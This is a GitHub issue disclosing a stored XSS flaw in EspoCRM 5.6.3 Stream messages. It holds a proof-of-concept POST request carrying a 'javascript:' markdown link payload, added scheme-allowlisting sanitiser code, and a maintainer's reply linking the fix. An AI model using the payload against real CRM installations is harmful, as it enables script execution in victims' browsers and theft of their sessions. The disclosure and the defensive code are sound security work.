
Stored XSS in Stream messages #1349

Closed
KhajiitStoleNothing opened this issue Jul 12, 2019 · 2 comments

Comments

@KhajiitStoleNothing

commented Jul 12, 2019

Description

The current version of EspoCRM, 5.6.3, is vulnerable to stored XSS due to a lack of filtering of user-supplied data in Stream messages. A malicious attacker can create a specially crafted link which contains JavaScript code and assign it to any user in the system. After the link is clicked, the malicious JavaScript code will be executed in the user's browser.

PoC

Make the following request (insert your authentication data and hostname).

POST /api/v1/Note HTTP/1.1
Host: <PASTE YOUR HOSTNAME HERE>
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Basic <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization: <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 108
Cookie: <PASTE YOUR COOKIE HERE>

{"type":"Post","targetType":"self","post":"[test](javascript:alert(document.domain%29)","attachmentsIds":[]}

Then open the notifications and click the link.
[screenshot of the rendered notification link, not reproduced]

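The root cause above is a markdown renderer that copies the `(url)` part of `[text](url)` straight into an `href`, so a `javascript:` URL becomes a clickable script. The following is an added example, not EspoCRM's code or the fix in 97bdd22: it parses each link target with the WHATWG `URL` constructor and only emits an anchor when the scheme is on an allowlist, rendering the raw markup as inert text otherwise. `BASE_URL` is an assumed placeholder origin used to resolve relative links.

```javascript
// Added example (not EspoCRM code): render [text](url) links from a Stream
// post into HTML, allowing only http(s) and mailto targets.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
// Assumed placeholder origin; a real application resolves against its own.
const BASE_URL = "https://crm.example.invalid/";

// Returns the href to emit, or null when the target must not become a link.
function safeHref(rawUrl) {
  let parsed;
  try {
    // The URL parser lowercases the scheme and strips leading controls and
    // spaces, so a prefix string check is not needed and is weaker: the
    // allowlist is applied to the canonical protocol. Percent-encoding in
    // the rest of the URL (such as %29 above) does not affect the scheme.
    parsed = new URL(rawUrl, BASE_URL);
  } catch {
    return null; // unparseable input is not a link
  }
  return ALLOWED_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Escape all plain text and turn allowed [text](url) pairs into anchors.
function renderPost(post) {
  const linkRe = /\[([^\]]*)\]\(([^)\s]+)\)/g;
  let out = "";
  let last = 0;
  for (const m of post.matchAll(linkRe)) {
    out += escapeHtml(post.slice(last, m.index));
    const href = safeHref(m[2]);
    out += href === null
      ? escapeHtml(m[0]) // disallowed scheme: keep the markup as inert text
      : `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${escapeHtml(m[1])}</a>`;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(post.slice(last));
}
```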
@yurikuzn

Contributor

commented Jul 15, 2019

Thanks for reporting. Fix: 97bdd22

@yurikuzn yurikuzn closed this Jul 15, 2019

@yurikuzn yurikuzn added this to the Version 5.6.4 milestone Jul 15, 2019

@yurikuzn yurikuzn self-assigned this Jul 15, 2019

@yurikuzn yurikuzn added the bug label Jul 15, 2019

@yurikuzn yurikuzn changed the title Stored XSS in Stream messages EspoCRM 5.6.3 Stored XSS in Stream messages Jul 15, 2019

@fgeek


commented Aug 7, 2019
